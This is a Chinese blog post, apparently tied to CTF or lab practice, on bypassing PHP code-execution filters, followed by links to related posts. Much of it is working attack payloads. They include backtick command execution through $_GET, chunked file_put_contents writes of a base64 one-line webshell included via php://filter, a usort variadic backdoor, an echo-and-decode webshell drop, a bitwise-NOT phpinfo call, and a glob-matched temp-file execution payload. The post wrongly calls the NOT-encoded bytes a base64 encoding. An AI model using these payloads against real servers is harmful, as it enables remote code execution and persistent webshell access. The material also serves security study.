RCE绕过技巧

已于 2024-08-12 00:59:14 修改
阅读量1k 收藏 28
点赞数 13
文章标签: linux 运维 服务器
于 2024-08-12 00:53:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68498873/article/details/141110124
版权

目录

EVAL长度限制突破技巧

1.使用反引号

2.file_put_contents写入文件

3.php5.6+变长参数+usort回调后门

命令长度限制突破技巧

1.拼接文件名

无字母数字的webshell命令执行

1.取反码

2.上传临时文件

EVAL长度限制突破技巧

分析代码:首先传递一个param参数,通过 if 判断传递的参数长度不能超过17位,并且不能包含eval和assert,然后eval执行。

由于Linux下的反引号可以执行命令,所以使用echo `$_GET[1]`;

把代码执行转换成命令执行

1.使用反引号

param=echo `$_GET[1]`;&1=id

效果:

有人就要问,不是说是限制到了17位一下吗。

因为后面的1=id不是前面param的值,所以写多长都没关系,$_GET[1]是获取通过传递的名为 1 的参数值。

2.file_put_contents写入文件

将一句话木马进行base64编码后追加写入文件

web.php?1=file_put_contents&param=$_GET[1](N,P,8);  

web.php?1=file_put_contents&param=$_GET[1](N,D,8);

...

web.php?1=file_put_contents&param=$_GET[1](N,w,8);

/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' ✲写入文件'N'中    */

web.php?param=include$_GET[1];&1=php://filter/read=convert.base64-decode/resource=N

用$_GET[1]中1接收file_put_contents,然后再file_put_contents中传三个参数

N:写入文件名

P:一句话木马的base64的编码

8:代表追加

未执行命令前的

执行后

因为像<等特殊符号,不能直接写入<,所以必须base64编码

3.php5.6+变长参数+usort回调后门

usort(...$_GET);

js中的可变长参数用...表示

?1[]=test&1[]=phpinfo();&2=assert

使用burpsuite抓包

修改GET为POST,加上usort(...$_GET);

使用的php版本最好为5.6,否则

右键->Send to Repeater

命令长度限制突破技巧

这段代码和上边一样,只是把参数长度变成不能超过8位,那么就不能使用`$_GET[1]`;了

只能执行简单的命令了

1.拼接文件名

因为Linux下可以使用>a来创建文件

用ls -t来以创建时间来列出当前目录下所有文件

将这条经过base64编码的一句话木马echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php就可以用上述方法写入webshell

无字母数字的webshell命令执行

这段代码将webshell长度不超过35位,除此之外还不允许包含字母数字,还不能包含$和_

这样就不能用上面的方法了。那怎么办

1.取反码

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式.

所以很简单了,因为不能出现字母所以就先构造一个可以生成phpinfo这个字符串的PHP表达式取反即可。如:(~%8F%97%8F%96%91%99%90)();

%8F%97%8F%96%91%99%90   --这个是phpinfo的base64编码

~   --取反

code=(~%8F%97%8F%96%91%99%90)();

这样就可以执行

2.上传临时文件

因为在php5版本中并不支持这种表达方式,所以我们就可以用php上传文件机制

先将本地的文件上传到服务器的临时目录 /tmp

然后在没有被删除的情况下执行起来

难点:1.匹配不到这个临时文件,因为这个文件名是随机生成的,全是英文和数字,但是代码又限制了这个。

2.没有执行权限

解决方法:1.经过多次尝试发现,上传的临时文件最后一个字母会出现大写字母。因为Linux是支持ascii,所以查看ascii发现大写字母的范围在 @-[ 之间,glob通配符 ? 匹配任意一个字符,* 匹配任意多个字符。

成功匹配到文件

2.在Linux下可以用 . [file]来执行文件

这样两个问题就都解决了

接下来就是用burpsuite抓包

先抓demo.html和web.php包

两个包repeater

如下所示,将demo.html包中的内容复制到web.php中

将GET改为POST是要接受下面的请求体

传递get参数,通过查找eval的官方文档,首先要闭合,然后再写php代码

?code=?><?=`.+/???/????????[@-[]`; ?>

成功

tretreet
关注
RCE漏洞挖掘经验分享(一)
记录并分享学习安全的知识点..
01-21 2365
一、RCE漏洞概述 RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 产生的原因:服务器没有对执行命令的函数做严格的过滤,最终导致命令被执行。 二、命令执行函数 1.PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等
SQL注入之EVAL长度限制突破技巧
m0_65858385的博客
08-11 692
这里向param传入的$_GET[1],这个GET[1]接受的参数是file_put_contents,实际GET[1]中写的就是file_put_contents,这个file_put_contents里传了三个参数,N、P、8,N是我们要写的文件名,也就是我们要写进这个文件里去,P是我们一句话木马的一个base64编码,8代表着追加。后在Linux中的查看会发现多了一个N的文件,N文件中内容为P,再执行一个web.php?
RCE绕过技巧和sql注入
chainsofted的博客
08-11 887
1.当substring()和substr()无法使用时:select * from security.users where id=1 and ascii(mid(database(),1,1))=115;2.从左边开始查:select * from security.users where id=1 and ascii(left(database(),1))=115;
命令执行 rce各种绕过技巧
m0_62102520的博客
01-13 2110
命令执行 rce各种绕过技巧
RCE多种绕过技巧
plutochen05的博客
08-11 264
这里的index.php是上面代码的文件名,该HTML文件和index.php在同一目录下(该目录是nginx底下的html目录)他过滤了所有的字母和数字,也就是说,不能输入如何字母/数字——即是输入字符,?限制的太严格了,不输入字母,数字怎么查询。这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码。他限制代码的长度,不能超过35个字节,下面这个才是最重要的。这个是index.php代码页面的包,是GET的。首先创建一个HTML文件,如下。这个是HTML传送时抓的包。
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2193
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1314
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
php采集绕过cloudflare,绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍...
weixin_32052253的博客
03-19 978
Web应用防火墙通常会被部署在Web客户端与Web服务器之间,以过滤来自服务器的恶意流量。而作为一名渗透测试人员,想要更好的突破目标系统,就必须要了解目标系统的WAF规则,以及想办法绕过该规则。本文将以CloudFlare WAF和ModSecurity OWASP CRS3为例,为大家进行演示如何使用未初始化的Bash变量,来绕过基于WAF正则表达式的过滤器和模式匹配。未初始化变量在之前两篇关于...
AllAboutBugBounty:有关漏洞赏金的所有信息(绕过,有效载荷等)
03-17
本篇文章将深入探讨Bug Bounty的各个方面,包括漏洞绕过技巧、有效载荷应用以及侦察技术,帮助你更好地理解和参与这一过程。 一、漏洞绕过:在Bug Bounty中,绕过技术是黑客们展示技巧的关键环节。这涉及到如何规避...
Linux】uImage头部信息详细解析
W__winter的博客
09-16 1104
代码】【Linux】uImage头部信息详细解析。
Linux】:信号与信号产生
Yikefore的博客
09-12 916
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
Linux】ldd常见问题
zclinux的博客
09-11 1028
当你自己编译程序时,可以通过。
Linux如何使用sed命令进行文本替换
yang295242361的博客
09-12 505
Linux中,sed(Stream Editor)是一个用于处理文本流的命令行工具,它非常适合用于执行基本的文本转换。sed可以读取输入的文本文件,根据指定的指令对文本进行处理,并将结果输出到标准输出设备。
Linux.之设备树DTS(device tree source)(一)
rjszcb的博客
09-11 290
Linux.之设备树DTS(device tree )
从零开始学习Linux(12)---进程间通信(信号量与信号)
最新发布
lys20221113242的博客
09-16 300
信号是操作系统提供的让用户(进程)给其他进程发送异步信息的一种方式,Linux定义了一系列的信号,每个信号都有一个唯一的编号和一个默认的行为。在并发编程中,当多个进程或线程需要访问共享资源时,信号量用来确保资源在同一时刻只被一个进程或线程访问,从而避免竞争条件。:如果信号量的值大于零,则将其减一;否则,进程或线程会被阻塞,直到信号量值变为正。:信号量是一个非负整数,用来表示可用的资源的数量。:其值可以是任何非负整数,用于表示资源的可用数量。:增加信号量的值,并唤醒等待的进程或线程。
一个linux下监听某个端口并拉起任务的shell脚本
唯有热爱 可抵万难
09-12 334
注意替换脚本和日志为自己的 绝对路径的文件。替换为你创建的监控脚本的文件名。
Linux 之 Nginx 下载/安装
sszdzq的博客
09-12 459
nginx 的解压目录与编译目录(默认:/usr/local/nginx)不能是一个。1.下载 nginx-1.26.2.tar.gz 并上传到 /usr/local。3. 指定相关配置--编译--安装。nginx.repo 文件内容。
"CTF知识总结:清晰目录,关键技巧精华收录
在PHP的进阶技巧方面,文档还介绍了一些关于Xdebug、Docker扩展、include函数、zip文件利用、无参数RCE、会话处理、PHAR文件利用、原生类利用、Opcache绕过、segmentfault包含、XPath注入、FastCGI利用等内容。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值